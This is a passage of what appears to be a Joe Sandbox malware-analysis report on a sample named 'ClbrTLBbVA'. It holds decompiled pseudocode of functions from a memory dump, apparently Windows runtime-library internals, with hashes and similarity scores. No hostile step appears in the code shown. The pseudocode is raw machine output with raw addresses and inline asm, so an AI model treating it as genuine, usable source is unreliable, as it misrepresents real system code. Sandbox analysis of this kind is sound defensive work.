                                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                        					 *_t59 = _t45 + 1;
                                        					L6:
                                        					 *(_t83 - 4) = 1;
                                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                        					 *(_t83 - 4) = _t80;
                                        					if(_t68 < 0) {
                                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                        						if(_t82 == 0) {
                                        							goto L14;
                                        						}
                                        						asm("btr eax, ecx");
                                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                        						if( *_t82 != 0) {
                                        							 *0x1797b10 =  *0x1797b10 - 8;
                                        						}
                                        						goto L20;
                                        					}
                                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                        					_t51 =  *0x179536c; // 0x77995368
                                        					if( *_t51 != 0x1795368) {
                                        						_push(3);
                                        						asm("int 0x29");
                                        						goto L14;
                                        					}
                                        					 *_t55 = 0x1795368;
                                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                        					 *_t51 = _t55;
                                        					 *0x179536c = _t55;
                                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                        					if(_t52 != 0) {
                                        						 *_t52 = _t55;
                                        					}
                                        					_t39 = 0;
                                        					goto L11;
                                        				}
                                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                                        				_t68 = E016DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                        				if(_t68 < 0) {
                                        					goto L14;
                                        				}
                                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                        				goto L6;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66b96427ced1b786362675fd9a519a4578ba3c4b59a02e3a5e6bd376c63eedf0
                                        • Instruction ID: 9fdfa70d5399c43087f482bb7cb00823b32319bc6a19b53166a03d6181047329
                                        • Opcode Fuzzy Hash: 66b96427ced1b786362675fd9a519a4578ba3c4b59a02e3a5e6bd376c63eedf0
                                        • Instruction Fuzzy Hash: D04179B5E04215DFCB15CFA8C890BA9BBF2BB49314F15C1ADEA05AB344C775A902CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E016CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                        				signed int* _v8;
                                        				char _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t33;
                                        				signed char _t43;
                                        				signed char _t48;
                                        				signed char _t62;
                                        				void* _t63;
                                        				intOrPtr _t69;
                                        				intOrPtr _t71;
                                        				unsigned int* _t82;
                                        				void* _t83;
                                        
                                        				_t80 = __ecx;
                                        				_t82 = __edx;
                                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                        				if((_t33 & 0x00000001) != 0) {
                                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                        					if(E016C7D50() != 0) {
                                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        					} else {
                                        						_t43 = 0x7ffe0386;
                                        					}
                                        					if( *_t43 != 0) {
                                        						_t43 = E01778D34(_v8, _t80);
                                        					}
                                        					E016C2280(_t43, _t82);
                                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                                        						E016BFFB0(_t62, _t80, _t82);
                                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                        						_t30 = _t80 + 0xd0; // 0xd0
                                        						_t83 = _t30;
                                        						E01778833(_t83,  &_v16);
                                        						_t81 = _t80 + 0x90;
                                        						E016BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                        						_t63 = 0;
                                        						_push(0);
                                        						_push(_t83);
                                        						_t48 = E016EB180();
                                        						if(_a4 != 0) {
                                        							E016C2280(_t48, _t81);
                                        						}
                                        					} else {
                                        						_t69 = _v8;
                                        						_t12 = _t80 + 0x98; // 0x98
                                        						_t13 = _t69 + 0xc; // 0x575651ff
                                        						E016CBB2D(_t13, _t12);
                                        						_t71 = _v8;
                                        						_t15 = _t80 + 0xb0; // 0xb0
                                        						_t16 = _t71 + 8; // 0x8b000cc2
                                        						E016CBB2D(_t16, _t15);
                                        						E016CB944(_v8, _t62);
                                        						 *((char*)(_t80 + 0xdc)) = 0;
                                        						E016BFFB0(0, _t80, _t82);
                                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                        						 *(_t80 + 0xde) = 0;
                                        						if(_a4 == 0) {
                                        							_t25 = _t80 + 0x90; // 0x90
                                        							E016BFFB0(0, _t80, _t25);
                                        						}
                                        						_t63 = 1;
                                        					}
                                        					return _t63;
                                        				}
                                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                        				if(_a4 == 0) {
                                        					_t24 = _t80 + 0x90; // 0x90
                                        					E016BFFB0(0, __ecx, _t24);
                                        				}
                                        				return 0;
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction ID: e235a169ad9131ae4dd698916eb60e23799422401d9c8acc1fcd06e7356ed8d6
                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction Fuzzy Hash: 15310172A01547AAD705EBB8CC90BF9FB5AFF52604F14815EC41C87302DB386A4ACBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E01727016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                        				signed int _v8;
                                        				char _v588;
                                        				intOrPtr _v592;
                                        				intOrPtr _v596;
                                        				signed short* _v600;
                                        				char _v604;
                                        				short _v606;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed short* _t55;
                                        				void* _t56;
                                        				signed short* _t58;
                                        				signed char* _t61;
                                        				char* _t68;
                                        				void* _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed int _t75;
                                        
                                        				_t64 = __edx;
                                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                        				_v8 =  *0x179d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                        				_t55 = _a16;
                                        				_v606 = __ecx;
                                        				_t71 = 0;
                                        				_t58 = _a12;
                                        				_v596 = __edx;
                                        				_v600 = _t58;
                                        				_t68 =  &_v588;
                                        				if(_t58 != 0) {
                                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                        					if(_t55 != 0) {
                                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                        					}
                                        				}
                                        				_t8 = _t71 + 0x2a; // 0x28
                                        				_t33 = _t8;
                                        				_v592 = _t8;
                                        				if(_t71 <= 0x214) {
                                        					L6:
                                        					 *((short*)(_t68 + 6)) = _v606;
                                        					if(_t64 != 0xffffffff) {
                                        						asm("cdq");
                                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                        						 *((char*)(_t68 + 0x28)) = _a4;
                                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                        						 *((char*)(_t68 + 0x29)) = _a8;
                                        						if(_t71 != 0) {
                                        							_t22 = _t68 + 0x2a; // 0x2a
                                        							_t64 = _t22;
                                        							E01726B4C(_t58, _t22, _t71,  &_v604);
                                        							if(_t55 != 0) {
                                        								_t25 = _v604 + 0x2a; // 0x2a
                                        								_t64 = _t25 + _t68;
                                        								E01726B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                        							}
                                        							if(E016C7D50() == 0) {
                                        								_t61 = 0x7ffe0384;
                                        							} else {
                                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        							}
                                        							_push(_t68);
                                        							_push(_v592 + 0xffffffe0);
                                        							_push(0x402);
                                        							_push( *_t61 & 0x000000ff);
                                        							E016E9AE0();
                                        						}
                                        					}
                                        					_t35 =  &_v588;
                                        					if( &_v588 != _t68) {
                                        						_t35 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                        					}
                                        					L16:
                                        					_pop(_t69);
                                        					_pop(_t72);
                                        					_pop(_t56);
                                        					return E016EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                        				}
                                        				_t68 = L016C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                        				if(_t68 == 0) {
                                        					goto L16;
                                        				} else {
                                        					_t58 = _v600;
                                        					_t64 = _v596;
                                        					goto L6;
                                        				}
                                        			}























                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01936e6aa9d72dac02ae7a6f5d29c46840f06728b626a7720499664b40250f76
                                        • Instruction ID: a6f61ce236b5b86ccb65a216ba8a344501cd25390fd1e6d5ce9db4e4243bb350
                                        • Opcode Fuzzy Hash: 01936e6aa9d72dac02ae7a6f5d29c46840f06728b626a7720499664b40250f76
                                        • Instruction Fuzzy Hash: D131C4726047A19BC324DF68CD40A6AF7E6FFD8700F144A2DF99587690E730E905CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E016DA70E(intOrPtr* __ecx, char* __edx) {
                                        				unsigned int _v8;
                                        				intOrPtr* _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t16;
                                        				intOrPtr _t17;
                                        				intOrPtr _t28;
                                        				char* _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t38;
                                        				void* _t50;
                                        				intOrPtr _t52;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t52 =  *0x1797b10; // 0x0
                                        				_t33 = __edx;
                                        				_t48 = __ecx;
                                        				_v12 = __ecx;
                                        				if(_t52 == 0) {
                                        					 *0x1797b10 = 8;
                                        					 *0x1797b14 = 0x1797b0c;
                                        					 *0x1797b18 = 1;
                                        					L6:
                                        					_t2 = _t52 + 1; // 0x1
                                        					E016DA990(0x1797b10, _t2, 7);
                                        					asm("bts ecx, eax");
                                        					 *_t48 = _t52;
                                        					 *_t33 = 1;
                                        					L3:
                                        					_t16 = 0;
                                        					L4:
                                        					return _t16;
                                        				}
                                        				_t17 = L016DA840(__edx, __ecx, __ecx, _t52, 0x1797b10, 1, 0);
                                        				if(_t17 == 0xffffffff) {
                                        					_t37 =  *0x1797b10; // 0x0
                                        					_t3 = _t37 + 0x27; // 0x27
                                        					__eflags = _t3 >> 5 -  *0x1797b18; // 0x0
                                        					if(__eflags > 0) {
                                        						_t38 =  *0x1797b9c; // 0x0
                                        						_t4 = _t52 + 0x27; // 0x27
                                        						_v8 = _t4 >> 5;
                                        						_t50 = L016C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                        						__eflags = _t50;
                                        						if(_t50 == 0) {
                                        							_t16 = 0xc0000017;
                                        							goto L4;
                                        						}
                                        						 *0x1797b18 = _v8;
                                        						_t8 = _t52 + 7; // 0x7
                                        						E016EF3E0(_t50,  *0x1797b14, _t8 >> 3);
                                        						_t28 =  *0x1797b14; // 0x0
                                        						__eflags = _t28 - 0x1797b0c;
                                        						if(_t28 != 0x1797b0c) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                        						}
                                        						_t9 = _t52 + 8; // 0x8
                                        						 *0x1797b14 = _t50;
                                        						_t48 = _v12;
                                        						 *0x1797b10 = _t9;
                                        						goto L6;
                                        					}
                                        					 *0x1797b10 = _t37 + 8;
                                        					goto L6;
                                        				}
                                        				 *__ecx = _t17;
                                        				 *_t33 = 0;
                                        				goto L3;
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27f80490f9958d4e0d3c7a1b1ce1c85f50a42a310dad08e27d80a9a7f6629000
                                        • Instruction ID: 3f4ff2f8453fc9b0adff9d0f6cc07bd2c930f0361faaad828c578d8997a57f80
                                        • Opcode Fuzzy Hash: 27f80490f9958d4e0d3c7a1b1ce1c85f50a42a310dad08e27d80a9a7f6629000
                                        • Instruction Fuzzy Hash: 0831E1B5A282059FC729CF48EC90F65BBFAFB85720F15895AE20587344D7B0990ACF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E016D61A0(signed int* __ecx) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				intOrPtr* _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				void* _t32;
                                        				intOrPtr _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t49;
                                        				signed int _t51;
                                        				intOrPtr _t52;
                                        				signed int _t54;
                                        				void* _t59;
                                        				signed int* _t61;
                                        				intOrPtr* _t64;
                                        
                                        				_t61 = __ecx;
                                        				_v12 = 0;
                                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                        				_v16 = __ecx;
                                        				_v8 = 0;
                                        				if(_t30 == 0) {
                                        					L6:
                                        					_t31 = 0;
                                        					L7:
                                        					return _t31;
                                        				}
                                        				_t32 = _t30 + 0x5d8;
                                        				if(_t32 == 0) {
                                        					goto L6;
                                        				}
                                        				_t59 = _t32 + 0x30;
                                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                        					goto L6;
                                        				}
                                        				if(__ecx != 0) {
                                        					 *((intOrPtr*)(__ecx)) = 0;
                                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                                        				}
                                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                        					_t51 =  *(_t32 + 0x10);
                                        					_t33 = _t32 + 0x10;
                                        					_v20 = _t33;
                                        					_t54 =  *(_t33 + 4);
                                        					if((_t51 | _t54) == 0) {
                                        						_t37 = E016D5E50(0x16867cc, 0, 0,  &_v12);
                                        						if(_t37 != 0) {
                                        							goto L6;
                                        						}
                                        						_t52 = _v8;
                                        						asm("lock cmpxchg8b [esi]");
                                        						_t64 = _v16;
                                        						_t49 = _t37;
                                        						_v20 = 0;
                                        						if(_t37 == 0) {
                                        							if(_t64 != 0) {
                                        								 *_t64 = _v12;
                                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                        							}
                                        							E01779D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                        							_t31 = 1;
                                        							goto L7;
                                        						}
                                        						E016AF7C0(_t52, _v12, _t52, 0);
                                        						if(_t64 != 0) {
                                        							 *_t64 = _t49;
                                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                        						}
                                        						L12:
                                        						_t31 = 1;
                                        						goto L7;
                                        					}
                                        					if(_t61 != 0) {
                                        						 *_t61 = _t51;
                                        						_t61[1] = _t54;
                                        					}
                                        					goto L12;
                                        				} else {
                                        					goto L6;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03c794078997c7818913a959b3f50a48383dac9b617a0cc1bb518c6b88d5ad6f
                                        • Instruction ID: 10e3870074a3001ec9cb4d920ab8327c6d469d00953cbc3f04628dd0e1405942
                                        • Opcode Fuzzy Hash: 03c794078997c7818913a959b3f50a48383dac9b617a0cc1bb518c6b88d5ad6f
                                        • Instruction Fuzzy Hash: 90317A72A093018FE324DF1DC800B2AFBE5FB88B00F05496DE9999B355E7B0E944CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E016E8EC7(void* __ecx, void* __edx) {
                                        				signed int _v8;
                                        				signed int* _v16;
                                        				intOrPtr _v20;
                                        				signed int* _v24;
                                        				char* _v28;
                                        				signed int* _v32;
                                        				intOrPtr _v36;
                                        				signed int* _v40;
                                        				signed int* _v44;
                                        				signed int* _v48;
                                        				intOrPtr _v52;
                                        				signed int* _v56;
                                        				signed int* _v60;
                                        				signed int* _v64;
                                        				intOrPtr _v68;
                                        				signed int* _v72;
                                        				char* _v76;
                                        				signed int* _v80;
                                        				signed int _v84;
                                        				signed int* _v88;
                                        				intOrPtr _v92;
                                        				signed int* _v96;
                                        				intOrPtr _v100;
                                        				signed int* _v104;
                                        				signed int* _v108;
                                        				char _v140;
                                        				signed int _v144;
                                        				signed int _v148;
                                        				signed int* _v152;
                                        				char _v156;
                                        				signed int* _v160;
                                        				char _v164;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t67;
                                        				intOrPtr _t70;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed int _t73;
                                        
                                        				_t69 = __edx;
                                        				_v8 =  *0x179d360 ^ _t73;
                                        				_t48 =  *[fs:0x30];
                                        				_t72 = __edx;
                                        				_t71 = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                        					_t48 = E016D4E70(0x17986e4, 0x16e9490, 0, 0);
                                        					if( *0x17953e8 > 5 && E016E8F33(0x17953e8, 0, 0x2000) != 0) {
                                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                        						_v108 =  &_v84;
                                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                        						_v76 =  &_v156;
                                        						_t70 = 8;
                                        						_v60 =  &_v144;
                                        						_t67 = 4;
                                        						_v44 =  &_v148;
                                        						_v152 = 0;
                                        						_v160 = 0;
                                        						_v104 = 0;
                                        						_v100 = 2;
                                        						_v96 = 0;
                                        						_v88 = 0;
                                        						_v80 = 0;
                                        						_v72 = 0;
                                        						_v68 = _t70;
                                        						_v64 = 0;
                                        						_v56 = 0;
                                        						_v52 = 0x17953e8;
                                        						_v48 = 0;
                                        						_v40 = 0;
                                        						_v36 = 0x17953e8;
                                        						_v32 = 0;
                                        						_v28 =  &_v164;
                                        						_v24 = 0;
                                        						_v20 = _t70;
                                        						_v16 = 0;
                                        						_t69 = 0x168bc46;
                                        						_t48 = E01727B9C(0x17953e8, 0x168bc46, _t67, 0x17953e8, _t70,  &_v140);
                                        					}
                                        				}
                                        				return E016EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c775b86c277812767cc93c0b2d3666018dce0c3c76100754d8490d99238002ff
                                        • Instruction ID: 55bdcdc2fb565a89c5ec5237ec568284e6483982b706d7d1d47e9e12970a58ab
                                        • Opcode Fuzzy Hash: c775b86c277812767cc93c0b2d3666018dce0c3c76100754d8490d99238002ff
                                        • Instruction Fuzzy Hash: F541A1B1D01228DFDB20CFAAD981AADFBF9FB48710F5042AEE509A7200D7745A45CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E016DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                        				intOrPtr* _v0;
                                        				signed char _v4;
                                        				signed int _v8;
                                        				void* __ecx;
                                        				void* __ebp;
                                        				void* _t37;
                                        				intOrPtr _t38;
                                        				signed int _t44;
                                        				signed char _t52;
                                        				void* _t54;
                                        				intOrPtr* _t56;
                                        				void* _t58;
                                        				char* _t59;
                                        				signed int _t62;
                                        
                                        				_t58 = __edx;
                                        				_push(0);
                                        				_push(4);
                                        				_push( &_v8);
                                        				_push(0x24);
                                        				_push(0xffffffff);
                                        				if(E016E9670() < 0) {
                                        					L016FDF30(_t54, _t58, _t35);
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					_push(_t54);
                                        					_t52 = _v4;
                                        					if(_t52 > 8) {
                                        						_t37 = 0xc0000078;
                                        					} else {
                                        						_t38 =  *0x1797b9c; // 0x0
                                        						_t62 = _t52 & 0x000000ff;
                                        						_t59 = L016C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                        						if(_t59 == 0) {
                                        							_t37 = 0xc0000017;
                                        						} else {
                                        							_t56 = _v0;
                                        							 *(_t59 + 1) = _t52;
                                        							 *_t59 = 1;
                                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                        							_t44 = _t62 - 1;
                                        							if(_t44 <= 7) {
                                        								switch( *((intOrPtr*)(_t44 * 4 +  &M016DE810))) {
                                        									case 0:
                                        										L6:
                                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                        										goto L7;
                                        									case 1:
                                        										L13:
                                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                        										goto L6;
                                        									case 2:
                                        										L12:
                                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                        										goto L13;
                                        									case 3:
                                        										L11:
                                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                        										goto L12;
                                        									case 4:
                                        										L10:
                                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                        										goto L11;
                                        									case 5:
                                        										L9:
                                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                        										goto L10;
                                        									case 6:
                                        										L17:
                                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                        										goto L9;
                                        									case 7:
                                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                        										goto L17;
                                        								}
                                        							}
                                        							L7:
                                        							 *_a40 = _t59;
                                        							_t37 = 0;
                                        						}
                                        					}
                                        					return _t37;
                                        				} else {
                                        					_push(0x20);
                                        					asm("ror eax, cl");
                                        					return _a4 ^ _v8;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72161595ffddb1a1d4fb8fbe5a039e5f86b9a9eca6ed4d532b4edade55b5f58c
                                        • Instruction ID: 789ef854fb73d5f0dcecea19f12e82ded91f0ab60224c55a4e0633a0fa932194
                                        • Opcode Fuzzy Hash: 72161595ffddb1a1d4fb8fbe5a039e5f86b9a9eca6ed4d532b4edade55b5f58c
                                        • Instruction Fuzzy Hash: 8F316D75A14249EFD744CF58D841F9ABBE4FB19314F15825AFA08CB341D632ED90CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E016DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t51;
                                        
                                        				_t51 =  *0x1796100; // 0x5
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				if(_t51 >= 0x800) {
                                        					L12:
                                        					return 0;
                                        				} else {
                                        					goto L1;
                                        				}
                                        				while(1) {
                                        					L1:
                                        					_t22 = _t51;
                                        					asm("lock cmpxchg [ecx], edx");
                                        					if(_t51 == _t22) {
                                        						break;
                                        					}
                                        					_t51 = _t22;
                                        					if(_t22 < 0x800) {
                                        						continue;
                                        					}
                                        					goto L12;
                                        				}
                                        				E016C2280(0xd, 0x75ef1a0);
                                        				_t41 =  *0x17960f8; // 0x0
                                        				if(_t41 != 0) {
                                        					 *0x17960f8 =  *_t41;
                                        					 *0x17960fc =  *0x17960fc + 0xffff;
                                        				}
                                        				E016BFFB0(_t41, 0x800, 0x75ef1a0);
                                        				if(_t41 != 0) {
                                        					L6:
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					asm("movsd");
                                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                        					do {
                                        						asm("lock xadd [0x17960f0], ax");
                                        						 *((short*)(_t41 + 0x34)) = 1;
                                        					} while (1 == 0);
                                        					goto L8;
                                        				} else {
                                        					_t41 = L016C4620(0x1796100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                        					if(_t41 == 0) {
                                        						L11:
                                        						asm("lock dec dword [0x1796100]");
                                        						L8:
                                        						return _t41;
                                        					}
                                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                        					if(_t41 == 0) {
                                        						goto L11;
                                        					}
                                        					goto L6;
                                        				}
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 910e434d92e9ed02215d360690dcebffccb60c2f1b2903c94d177cc3106ea2d1
                                        • Instruction ID: 6e98a54d152aba8005f8d7e94ee5fccff94d64f017fc8ebf31f270f258db6987
                                        • Opcode Fuzzy Hash: 910e434d92e9ed02215d360690dcebffccb60c2f1b2903c94d177cc3106ea2d1
                                        • Instruction Fuzzy Hash: 7D310172A006169BCB21EF5CD8C1BA673B4FB19320F164179ED44DB30AEB34D94A8B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E016A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                        				signed int _t53;
                                        				signed int _t56;
                                        				signed int* _t60;
                                        				signed int _t63;
                                        				signed int _t66;
                                        				signed int _t69;
                                        				void* _t70;
                                        				intOrPtr* _t72;
                                        				void* _t78;
                                        				void* _t79;
                                        				signed int _t80;
                                        				intOrPtr _t82;
                                        				void* _t85;
                                        				void* _t88;
                                        				void* _t89;
                                        
                                        				_t84 = __esi;
                                        				_t70 = __ecx;
                                        				_t68 = __ebx;
                                        				_push(0x2c);
                                        				_push(0x177f6e8);
                                        				E016FD0E8(__ebx, __edi, __esi);
                                        				 *((char*)(_t85 - 0x1d)) = 0;
                                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                                        				if(_t82 == 0) {
                                        					L4:
                                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                        						E017788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                        					}
                                        					L5:
                                        					return E016FD130(_t68, _t82, _t84);
                                        				}
                                        				_t88 = _t82 -  *0x17986c0; // 0x12407b0
                                        				if(_t88 == 0) {
                                        					goto L4;
                                        				}
                                        				_t89 = _t82 -  *0x17986b8; // 0x0
